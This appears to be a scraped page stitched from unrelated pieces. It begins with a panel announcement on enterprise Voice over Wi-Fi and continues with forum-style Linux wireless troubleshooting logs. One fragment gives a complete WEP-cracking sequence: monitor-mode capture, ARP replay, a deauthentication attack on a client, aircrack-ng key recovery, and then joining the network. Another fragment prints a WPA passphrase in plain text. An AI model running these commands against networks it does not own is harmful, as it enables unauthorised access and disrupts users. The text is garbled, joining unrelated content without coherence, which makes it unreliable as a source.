Tags: wireless
Event: Black Hat EU 2005
I will be moderating this panel at IT Expo in Miami on February 2nd at 10:00 am.
Voice over WLAN has been deployed in enterprise applications for years, but has yet to reach mainstream adoption (beyond vertical markets). With technologies like mobile UC, 802.11n, fixed-mobile convergence and VoIP for smartphones raising awareness/demand, there are a number of vendors poised to address market needs by introducing new and innovative devices. This session will look at what industries have already adopted VoWLAN and why – and what benefits they have achieved, as well as the technology trends that make VoWLAN possible.
The panelists are:
All three of these companies have a venerable history in enterprise Wi-Fi phones; the two original pioneers of enterprise Voice over Wireless LAN were Symbol and Spectralink, which Motorola and Polycom acquired respectively in 2006 and 2007. Cisco announced a Wi-Fi handset (the 7920) to complement their Cisco CallManager in 2003. But the category has obstinately remained a niche for almost a decade.
It has been clear from the outset that cell phones would get Wi-Fi, and it would be redundant to have dedicated Wi-Fi phones. And of course, now that has come to pass. The advent of the iPhone with Wi-Fi in 2007 subdued the objections of the wireless carriers to Wi-Fi and knocked the phone OEMs off the fence. By 2010 you couldn’t really call a phone without Wi-Fi a smartphone, and feature phones aren’t far behind.
So this session will be very interesting, answering questions about why enterprise voice over Wi-Fi has been so confined, and why that will no longer be the case.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.
Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode disabled)
I then enable it with monitor mode:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
I test injection and it works fine.
root@bt:~# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
It just started happening in bt4, to get it to work again I have to disconnect the adapter and reconnect it.
airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
Notes:
ifconfig wlan1 10.10.10.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o wlan0 -s 10.10.10.0/24 -j MASQUERADE
Also I will set up DHCP on wlan1 so that all my computers at home can get connected to the access point with ease.
root@bt:~/acx-20071003# lspci |grep -i net
05:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)
07:08.0 Ethernet controller: Intel Corporation PRO/100 VE Network Connection (rev 02)
08:00.0 Network controller: Texas Instruments ACX 100 22Mbps Wireless Interface
root@bt:~/acx-20071003# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wmaster0 no wireless extensions.
wlan0 IEEE 802.11abg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=0 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
root@bt:~/acx-20071003# make -C /lib/modules/`uname -r`/build M=`pwd`
make: Entering directory `/usr/src/linux-source-2.6.30.9'
WARNING: Symbol version dump /usr/src/linux-source-2.6.30.9/Module.symvers is missing; modules will have no dependencies and modversions.
CC [M] /root/acx-20071003/wlan.o
In file included from /root/acx-20071003/acx.h:2,
from /root/acx-20071003/wlan.c:49:
/root/acx-20071003/wlan_compat.h:224: error: conflicting types for 'irqreturn_t'
include/linux/irqreturn.h:16: error: previous declaration of 'irqreturn_t' was here
make[1]: *** [/root/acx-20071003/wlan.o] Error 1
make: *** [_module_/root/acx-20071003] Error 2
make: Leaving directory `/usr/src/linux-source-2.6.30.9'
The key piece to sorting this out was adding this line to my /etc/modprobe.d/options and then re-starting my system (simple - brute force!):
options cfg80211 ieee80211_regdom="EU"
"iwlist wlan0 channel" previously only reported channels 1 to 11, but now shows all of them. No problems connecting to the AP now on channel 13:
steve@steve-laptop:~$ iwlist wlan0 channel
wlan0 13 channels in total; available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
( blah blah blah blah )
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency=2.472 GHz (Channel 13)
/etc/init.d/NetworkManager start
And then just add a connection to my wlan0 (my router, a linksys)
ifconfig wlan0 down
iwconfig wlan0 essid linksys key "s:<thekey>"
ifconfig wlan0 up
(I was under the impression that this was the way to do it?
airodump:
00:12:CF:6C:57:73 -66 99 286 7 2 54e. WPA TKIP PSK suat1
root@l:/tmp# cat /etc/wpa_supplicant/net.conf
network={
ssid="suat1"
key_mgmt=WPA-PSK
psk="a2341436z"
}
root@l:/tmp# wpa_supplicant -Dwext -B -c /etc/wpa_supplicant/net.conf -i wlan0
root@l:/tmp# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit snip
mon0: unknown hardware address type 803
wmaster0: unknown hardware address type 801
mon0: unknown hardware address type 803
wmaster0: unknown hardware address type 801
Listening on LPF/wlan0/00:1d:e0:a1:25:01
Sending on LPF/wlan0/00:1d:e0:a1:25:01
Sending on Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 9
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 13
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 5
No DHCPOFFERS received.
Trying recorded lease 192.168.1.126
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms
Trying recorded lease 192.168.2.135
PING 192.168.2.2 (192.168.2.2) 56(84) bytes of data.
--- 192.168.2.2 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time 0ms
No working leases in persistent database - sleeping.
root@l:/tmp#
And the output of iwlist:
wlan0 Scan completed :
Cell 01 - Address: 00:12:CF:6C:57:73
ESSID:"suat1"
Mode:Master
Channel:2
Frequency:2.417 GHz (Channel 2)
Quality=100/100 Signal level:-46 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 00057375617431
IE: Unknown: 010882848B0C12961824
IE: Unknown: 030102
IE: Unknown: 0706545249010D14
IE: Unknown: 200100
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F2020101020003A4000027A4000042435E0062322F00
IE: Unknown: DD0900037F01010020FF7F
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=00000003a1812181
Extra: Last beacon: 0ms ago
Not sure what's wrong here! Everything looks fine.